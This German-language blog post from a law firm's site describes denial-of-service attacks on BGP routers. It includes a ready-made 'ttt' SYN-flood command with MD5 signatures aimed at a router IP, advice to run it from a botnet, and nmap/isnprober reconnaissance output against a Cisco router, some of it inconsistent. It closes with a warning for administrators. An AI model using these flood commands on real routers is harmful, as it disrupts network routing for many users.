Москва
+7-929-527-81-33
Вологда
+7-921-234-45-78
Вопрос юристу онлайн Юридическая компания ЛЕГАС Вконтакте

"Blinde" DoS-Angriffe auf BGP-Router.

Обновлено 29.09.2025 12:13

Blind werden wir diese Angriffe nennen, die außer der IP-Adresse des BGP-Routers kein zusätzliches Wissen erfordern. Das einfachste Szenario eines solchen DoS-Angriffs ist SYN flood auf TCP-Port 179. Um einen solchen Angriff auf einen Industrierouter zu implementieren, müssen Sie mehrere Dutzend Computer verwenden, besser ein Botnetz.

Eine interessantere Möglichkeit, einen BGP-Zielrouter mit MD5-Authentifizierung zu «überschwemmen», besteht darin, SYN-TCP-Pakete mit MD5-Signaturen zu verwenden. Dieser Angriff ermöglicht es, der Verarbeitung von MD5 durch den angegriffenen Router eine Rechenlast hinzuzufügen.

Ein solcher Angriff ist mit dem Dienstprogramm ttt mit der Option md5 einfach durchzuführen. Um die Überflutung zu optimieren, müssen mehrere Instanzen von ttt auf mehreren Dutzend Maschinen ausgeführt werden.

Hier ist ein Beispiel für die Verwendung des Dienstprogramms ttt:

arhontus# ./ttt --flood 10000000 -y 11006 --syn --md5

allyourbgparebelongtous -D 192.168.66.191 && ./ttt --flood 10000000 -y

179 --syn --md5 allyourbgparebelongtous -D 192.168.66.191

Wenn wir über die Hardware von Cisco Systems sprechen, sollten wir die Möglichkeit erwähnen, Angriffe auf den TCP / IP-Stapelüberlauf von IOS zu implementieren. Sie können Schwachstellenscanner wie Nmap, hping2 und isnprober verwenden, um solche Schwachstellen zu identifizieren.

Hier ist ein Beispiel für einen Cisco 2600 Router:

kali# nmap -sS -O -vvvv 192.168.66.215

<skip>

TCP Sequence Prediction: class="truly" random

Difficulty=9999999 (Good luck!)

TCP ISN Seq. Numbers: 5142798B A95D7AC9 71F42B5A 4D684349 FF2B94D4 B764FD5C

<skip> arhontus# # perl isnprober.pl -n 10 -i eth0 -p 23 192.168.66.215

-- ISNprober / 1.02 / Tom Vandepoel (Tom.Vandepoel@ubizen.com) --

Using eth0:192.168.77.5

Probing host: 192.168.66.215 on TCP port 23.

Host:port ISN Delta

192.168.66.202:23 -1154503313

192.168.66.202:23 -24125463 1130377850

192.168.66.202:23 2031059534 2055184997

192.168.66.202:23 965205234 -1065854300

192.168.66.202:23 -1974685094 -2939890328

192.168.66.202:23 1760147902 3734832996

192.168.66.202:23 2089287258 329139356

192.168.66.202:23 -923724721 -3013011979

192.168.66.202:23 -934490140 -10765419

192.168.66.202:23 -1262713275 -328223135

Im Allgemeinen ist das BGP-Routingprotokoll Version 4 ein wesentlicher Bestandteil des modernen Internets, und daher werden sich Probleme bei der Arbeit dieses Protokolls sicherlich auf das Funktionieren des globalen Netzwerks auswirken. Wenn also der Systemadministrator die Wartung von BGP-Routern (in der Regel Dienstleistungsunternehmen) übernimmt, müssen Sie mögliche Bedrohungen ernst nehmen und im Voraus Maßnahmen ergreifen, um sie zu schützen.

Oleg Petukhov, Rechtsanwalt im Bereich des Völkerrechts und des Schutzes personenbezogener Daten, Spezialist für Informationstechnik sicherheit, Schutz von Informationen und persönlichen Daten.

Telegramm-Kanal: https://t.me/datenschutzmit

Die Gruppe im Telegramm: https://t.me/datenschutzmit1

Website: https://legascom.ru

E-Mail: online@legascom.ru

#informationssicherheit #informationssicherheit